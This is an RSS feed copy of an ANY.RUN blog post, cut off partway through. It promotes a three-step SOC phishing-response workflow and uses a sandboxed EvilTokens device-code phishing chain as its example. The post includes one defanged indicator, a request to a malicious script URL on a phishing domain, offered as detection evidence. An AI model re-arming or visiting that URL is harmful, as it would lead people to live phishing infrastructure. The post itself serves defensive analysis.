<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" version="2.0">

<channel>
	<title>ANY.RUN RSS feed</title>
	<atom:link href="https://any.run/cybersecurity-blog/feed/" rel="self" type="application/rss+xml"/>
	<link/>
	<description>The latest posts and cybersecurity news</description>
	<lastBuildDate>Wed, 30 Sep 2026 11:40:36 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/cropped-Favicon_WebSite_Rounded-32x32.png</url>
	<title>ANY.RUN's Cybersecurity Blog</title>
	<link/>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Phishing Response Protocol: 3 Essential SOC Steps Powered by ANY.RUN’s Latest Updates</title>
		<link>https://any.run/cybersecurity-blog/phishing-response-protocol/</link>
					<comments>https://any.run/cybersecurity-blog/phishing-response-protocol/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 30 Sep 2026 09:51:07 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=23490</guid>

					<description><![CDATA[<p>Phishing investigations put pressure on SOC teams at several points at once: analysts need to uncover hidden activity, make a confident decision from incomplete evidence, prepare the case for escalation, and then determine whether the threat extends beyond a single incident. Every manual step adds time to the response. It also ties up analyst capacity [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/phishing-response-protocol/">Phishing Response Protocol: 3 Essential SOC Steps Powered by ANY.RUN&#8217;s Latest Updates</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">Phishing investigations put pressure on SOC teams at several points at once: analysts need to uncover hidden activity, make a confident decision from incomplete evidence, prepare the case for escalation, and then determine whether the threat extends beyond a single incident. </p>



<p class="wp-block-paragraph">Every manual step adds time to the response. It also ties up analyst capacity in work that could be spent investigating and containing real threats. </p>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktolanding">ANY.RUN</a>’s latest product updates are designed to close these gaps as one connected workflow, rather than as separate features. Together, they help teams move from <strong>detection to investigation, response, and proactive defense</strong> while keeping evidence and context connected throughout the process.</p>



<h2 class="wp-block-heading">Phishing Remains a High-Volume, High-Cost SOC Problem </h2>



<p class="wp-block-paragraph">Phishing isn’t just another alert category competing for analysts’ attention. In several critical industries, it shows up in <strong>more than 70% of investigations</strong>: ANY.RUN’s 2026 data puts phishing exposure at <strong>73.4% in finance</strong> and <strong>72.2% in manufacturing</strong>. </p>



<p class="wp-block-paragraph">And the consequences extend far beyond the inbox. Microsoft Incident Response found that <strong>28% of the breaches it investigated started with phishing or social engineering</strong>, including newer techniques such as device code phishing. </p>



<p class="wp-block-paragraph">The financial stakes are just as hard to ignore. In 2025, the FBI received <strong>191,561 phishing and spoofing complaints</strong>, while Business Email Compromise alone generated <strong>$3.05 billion in reported US losses</strong>. </p>



<p class="wp-block-paragraph">For SOC teams, that combination means high investigation volume, increasingly evasive attacks, and very little room for slow decisions.</p>



<p class="wp-block-paragraph">Finding a suspicious email or URL is only the beginning. Analysts still need to understand what happened, collect enough evidence to act, pass the case to the right team, and make sure the same threat is easier to catch next time.  </p>



<h2 class="wp-block-heading">What Faster Phishing Response Looks Like </h2>



<p class="wp-block-paragraph">With phishing showing up in such a large share of SOC investigations, simply putting more analyst time into every suspicious URL is not a sustainable answer. </p>



<p class="wp-block-paragraph">The bigger opportunity is to cut the manual work between <strong>detection, investigation, response, and follow-up</strong>. That is the idea behind several of ANY.RUN’s latest product updates: give analysts more of the evidence they need upfront, make the handoff easier, and turn each investigation into a starting point for proactive defense. </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-401"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="4"
           data-rows="4"
           data-wpID="401"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Step                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        SOC Goal                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        ANY.RUN Capabilities                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="D1"
                    data-col-index="3"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        What Improves                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        1. Accelerate Triage                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        See the full phishing attack and collect enough evidence to make a confident decision                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        <a class="wpdt-link-content" style="color: #4BAEE3; text-decoration: underline;" href="https://any.run/cybersecurity-blog/automatic-ssl-decryption/" rel="" target="_blank" data-cell-id="12" data-link-url="https://any.run/cybersecurity-blog/automatic-ssl-decryption/" data-link-text="SSL Decryption without MITM" data-link-target="true" data-link-nofollow="0" data-link-noreferrer="0" data-link-sponsored="0" data-link-btn-status="0" data-link-btn-class="" data-link-content="wpdt-link-content">SSL Decryption without MITM</a> + <a class="wpdt-link-content" style="color: #4BAEE3; text-decoration: underline;" href="https://any.run/cybersecurity-blog/in-browser-data-inspection/" rel="" target="_blank" data-cell-id="12" data-link-url="https://any.run/cybersecurity-blog/in-browser-data-inspection/" data-link-text="In-Browser Data Inspection" data-link-target="true" data-link-nofollow="0" data-link-noreferrer="0" data-link-sponsored="0" data-link-btn-status="0" data-link-btn-class="" data-link-content="wpdt-link-content">In-Browser Data Inspection</a>                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D2"
                    data-col-index="3"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        20% less Tier 1 investigation time with faster threat validation and less manual traffic and browser reconstruction                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        2. Improve Escalation & Response                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Turn technical findings into a clear case that the next team can act on                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        <a class="wpdt-link-content" style="color: #4BAEE3; text-decoration: underline;" href="https://any.run/cybersecurity-blog/soc-ready-reporting/" rel="" target="_blank" data-cell-id="22" data-link-url="https://any.run/cybersecurity-blog/soc-ready-reporting/" data-link-text="Tier 1 reports + AI Summary + AI Recommendations " data-link-target="true" data-link-nofollow="0" data-link-noreferrer="0" data-link-sponsored="0" data-link-btn-status="0" data-link-btn-class="" data-link-content="wpdt-link-content">Tier 1 reports + AI Summary + AI Recommendations </a>                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D3"
                    data-col-index="3"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        30% fewer escalations and 21 minutes less MTTR per case with clearer handoffs and faster response                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        3. Move to Proactive Defense                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Go beyond the individual incident and understand the wider threat                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        <a class="wpdt-link-content" style="color: #4BAEE3; text-decoration: underline;" href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktotilookuplanding" rel="" target="_blank" data-cell-id="32" data-link-url="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktotilookuplanding" data-link-text="Connections in Threat Intelligence Lookup " data-link-target="true" data-link-nofollow="0" data-link-noreferrer="0" data-link-sponsored="0" data-link-btn-status="0" data-link-btn-class="" data-link-content="wpdt-link-content">Connections in Threat Intelligence Lookup </a>                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D4"
                    data-col-index="3"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Faster pivoting to related infrastructure,    retrohunting, blocking, and stronger future detection                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-401'>
table#wpdtSimpleTable-401{ table-layout: fixed !important; }
table#wpdtSimpleTable-401 td, table.wpdtSimpleTable401 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">Without a structured workflow, phishing investigations can become fragmented, with analysts switching between validation, reporting, escalation, and follow-up research.</p>



<p class="wp-block-paragraph">With the 3-step approach, those activities connect into one continuous process, so evidence moves forward with the case and each investigation contributes to broader SOC visibility and future detection.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut the manual work from phishing response.

</span> 
<br>
See how ANY.RUN helps your SOC move from alert to action. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=phishing-response-protocol&#038;utm_term=300926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Explore ANY.RUN for Your SOC </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">3 Steps from Phishing Detection to Faster Response and Stronger Defense </h2>



<p class="wp-block-paragraph">For this walkthrough, we’ll use a modern phishing attack with the following execution chain: </p>



<p class="wp-block-paragraph"><strong>Cloudflare CAPTCHA → Phishing document lure → Device Code Phishing (EvilTokens)</strong> </p>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/eviltokens/" target="_blank" rel="noreferrer noopener">EvilTokens</a> is a phishing-as-a-service platform that abuses Microsoft’s legitimate device code authentication flow to steal session tokens and gain access to accounts. Its campaigns can combine CAPTCHA gates, redirects, legitimate cloud services, and dynamic phishing pages, which makes the attack harder to judge from the original URL alone and creates extra work for SOC analysts trying to piece together what actually happened.</p>



<p class="wp-block-paragraph">The full attack is captured in this <a href="https://app.any.run/tasks/59bddc5a-ed5f-4d9b-82d8-2ca1ef0aeeda/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">ANY.RUN sandbox session</a></p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img fetchpriority="high" decoding="async" width="1024" height="637" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-for-faster-triage-1024x637.png" alt="Full EvilTokens attack chain exposed in ANY.RUN Sandbox in under a minute " class="wp-image-23500" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-for-faster-triage-1024x637.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-for-faster-triage-300x187.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-for-faster-triage-768x478.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-for-faster-triage-1536x956.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-for-faster-triage-2048x1274.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-for-faster-triage-370x230.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-for-faster-triage-270x168.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-for-faster-triage-740x460.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Full EvilTokens attack chain exposed in ANY.RUN Sandbox in under a minute</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Now let’s follow the investigation through the three steps of the phishing response workflow. </p>



<h3 class="wp-block-heading">Step 1: Accelerate Triage with Full Attack Visibility Using SSL Decryption and In-Browser Data Inspection  </h3>



<p class="wp-block-paragraph">The first problem SOC teams face is getting enough evidence to make a confident decision quickly. </p>



<p class="wp-block-paragraph">That becomes harder with modern phishing, where the activity that matters may sit behind encrypted HTTPS traffic, redirects, CAPTCHA gates, scripts, and browser changes. A suspicious URL alone rarely tells the whole story. </p>



<p class="wp-block-paragraph">So, the first step is to expose as much of the attack as possible without forcing the analyst to reconstruct it manually across several tools.</p>



<p class="wp-block-paragraph">In the EvilTokens case, the suspicious URL is opened in <strong>ANY.RUN’s </strong><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a>. As the attack unfolds, the Network section records the web requests made by the browser, including traffic that was originally encrypted over HTTPS. </p>



<figure class="wp-block-image size-large"><img decoding="async" width="1024" height="208" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/newscreen1-1024x208.png" alt="" class="wp-image-23532" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/newscreen1-1024x208.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/newscreen1-300x61.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/newscreen1-768x156.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/newscreen1-370x75.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/newscreen1-270x55.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/newscreen1-740x150.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/newscreen1.png 1141w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>HTTP requests displayed inside ANY.RUN sandbox</em></figcaption></figure>



<p class="wp-block-paragraph">This shows where the phishing page connects, which resources it loads, and what happens in the background while the victim interacts with the page. </p>



<p class="wp-block-paragraph">Analysts can then open the Content view to inspect individual request-response pairs and look for suspicious patterns. In this case, one of the requests is: </p>



<p class="wp-block-paragraph">GET hxxps[://]preponacrea[.]com/est/js/main[.]js </p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" width="869" height="711" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Connect-preview-edited.png" alt="Preview of suspicious patterns in ANY.RUN sandbox" class="wp-image-23534" style="aspect-ratio:1.222846484543821;width:574px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Connect-preview-edited.png 869w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Connect-preview-edited-300x245.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Connect-preview-edited-768x628.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Connect-preview-edited-370x303.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Connect-preview-edited-270x221.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Connect-preview-edited-740x605.png 740w" sizes="(max-width: 869px) 100vw, 869px" /><figcaption class="wp-element-caption"><em>Preview of suspicious patterns in ANY.RUN sandbox</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">This is where <a href="https://any.run/cybersecurity-blog/automatic-ssl-decryption/" target="_blank" rel="noreferrer noopener"><strong>SSL Decryption without MITM</strong></a> changes the investigation. ANY.RUN extracts encryption keys directly from process memory, making HTTPS traffic available for inspection, Suricata rules, signatures, and IOC extraction, without setting up a separate MITM proxy or replacing certificates. </p>



<p class="wp-block-paragraph">Network traffic, however, is only one side of the attack. The next part of the investigation happens in our newly added <a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/" target="_blank" rel="noreferrer noopener"><strong>Browser Data</strong></a><strong> </strong>section.  </p>



<p class="wp-block-paragraph">Here, analysts can follow the redirect chain leading to the phishing page and inspect what changes inside the browser as the attack progresses, including HTTP requests, DOM changes, iframes, screenshots, and other page activity. </p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="703" height="607" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/browser-data.png" alt="In-browser data inspection reveals full attack visibility into the phishing page" class="wp-image-23503" style="width:539px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/browser-data.png 703w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/browser-data-300x259.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/browser-data-370x319.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/browser-data-270x233.png 270w" sizes="auto, (max-width: 703px) 100vw, 703px" /><figcaption class="wp-element-caption"><em>In-browser data inspection reveals full attack visibility into the phishing page</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Together, <strong>SSL Decryption without MITM + In-Browser Data Inspection</strong> give the analyst both sides of the attack: what happens on the network and what happens inside the browser. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="498" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/HTML-DOM-changes-1024x498.png" alt="HTML DOM changes displayed inside ANY.RUN Sandbox" class="wp-image-23504" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/HTML-DOM-changes-1024x498.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/HTML-DOM-changes-300x146.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/HTML-DOM-changes-768x374.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/HTML-DOM-changes-1536x747.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/HTML-DOM-changes-370x180.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/HTML-DOM-changes-270x131.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/HTML-DOM-changes-740x360.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/HTML-DOM-changes.png 1850w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>HTML DOM changes displayed inside ANY.RUN Sandbox</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Instead of digging through hundreds of web-log entries, opening PCAPs separately, and manually rebuilding the redirect chain, Tier 1 gets the evidence needed for validation in one analysis. </p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="717" height="191" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-edited.png" alt="" class="wp-image-23535" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-edited.png 717w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-edited-300x80.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-edited-370x99.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-edited-270x72.png 270w" sizes="auto, (max-width: 717px) 100vw, 717px" /></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="221" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-network-1024x221.png" alt="ANY.RUN automatically decrypts traffic for Suricata analysis" class="wp-image-23507" style="aspect-ratio:4.63368384761248;width:724px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-network-1024x221.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-network-300x65.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-network-768x166.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-network-370x80.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-network-270x58.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-network-740x160.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Suricata-network.png 1147w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN automatically decrypts traffic for Suricata analysis</em></figcaption></figure>
</div>


<!-- Highlight Block HTML START -->
<div class="window">
  <div class="window-header">
    <div class="pill"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/261d.png" alt="☝" class="wp-smiley" style="height: 1em; max-height: 1em;" />Step 1 SOC outcomes:</div>
  </div>
  <div class="window-body">
    <ul>
      <li>More phishing cases resolved at Tier 1</li>
      <li>Higher analyst throughput without increasing headcount</li>
      <li>Less time lost rebuilding browser and traffic activity</li>
<li>Faster confidence on whether a case needs action </li>
    </ul>
  </div>
</div>
<!-- Highlight Block HTML END -->


<!-- Highlight Block CSS START -->
<style>
  .window {
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);

    border-radius: 4px;
    margin: 20px auto 50px auto;
    padding: 20px 40px;
    line-height: 2rem;
  }

  .window-header {
    display: flex;
    justify-content: center;
    margin-bottom: 20px;
  }

  .pill {
    background-color: #fff;
    border-radius: 20px;
    color: #333;
    font-weight: bold;
    padding: 8px 32px;
border: 1px solid rgba(75, 174, 227, 0.32);
  }

  @media (max-width: 480px) {
    .window {
      padding: 10px;
    }
    
    .pill {
      font-size: 14px;
      padding: 6px 12px;
    }
  }
</style>
<!-- Highlight Block CSS END -->



<h3 class="wp-block-heading">Step 2: Improve Escalation &amp; Response with AI-Powered Tier 1 Reports </h3>



<p class="wp-block-paragraph">Confirming that a phishing attack is malicious does not finish the analyst’s job. </p>



<p class="wp-block-paragraph">The technical findings still need to become something another person can act on: what happened, why the activity is malicious, which indicators matter, and what should happen next. </p>



<p class="wp-block-paragraph">Without that context, Tier 2 or incident response may have to reopen the original analysis, review the evidence again, and rebuild parts of the case before making a decision. </p>



<p class="wp-block-paragraph">That reporting burden is still highly manual across SOCs. According to the SANS SOC Survey 2025, <strong>69% of SOCs create metrics manually or mostly manually</strong>, while nearly half describe the process as very time-consuming. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">30% fewer escalations. MTTR reduced by 21 mins per case. 

</span> 
<br>
Get more capacity from your existing SOC team. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
 Increase SOC Capacity</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">At this stage, the goal is to move from technical analysis to a <strong>response-ready decision</strong> without writing the case from scratch. </p>



<p class="wp-block-paragraph">For the EvilTokens analysis, <a href="https://any.run/cybersecurity-blog/soc-ready-reporting/" target="_blank" rel="noreferrer noopener"><strong>Tier 1 reports</strong></a> bring the key findings into one structured view. </p>



<p class="wp-block-paragraph"><a href="https://any.run/report/59bddc5a-ed5f-4d9b-82d8-2ca1ef0aeeda/summary/tier1?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">See the Tier 1 report for this analysis</a> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="153" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-TI-report-1024x153.png" alt="Tier 1 report for the EvilTokens phishing analysis" class="wp-image-23492" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-TI-report-1024x153.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-TI-report-300x45.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-TI-report-768x115.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-TI-report-370x55.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-TI-report-270x40.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-TI-report-740x111.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-TI-report.png 1102w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Tier 1 report for the EvilTokens phishing analysis</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The report gives the next responder the information needed to quickly understand the case, including: </p>



<ul class="wp-block-list">
<li>The analysis verdict and relevant threat or campaign tags </li>



<li>An <strong>AI Summary</strong> explaining what happened during the session </li>



<li>Key IOCs and technical events that can support blocking or hunting </li>



<li><strong>AI Recommendations</strong> with actions the team can consider next </li>
</ul>



<p class="wp-block-paragraph">Instead of translating raw sandbox output into another incident summary by hand, the analyst gets a ready-to-share view of the case. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="680" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-summary-1024x680.png" alt="AI summary generated for EvilTokens attack" class="wp-image-23493" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-summary-1024x680.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-summary-300x199.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-summary-768x510.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-summary-370x246.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-summary-270x179.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-summary-740x491.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-summary.png 1106w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>AI summary generated for EvilTokens attack</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">For Tier 1, that makes it easier to answer the three questions that matter before escalation: <strong>What happened? Why is it malicious? What should happen next?</strong> </p>


<div class="wp-block-image">
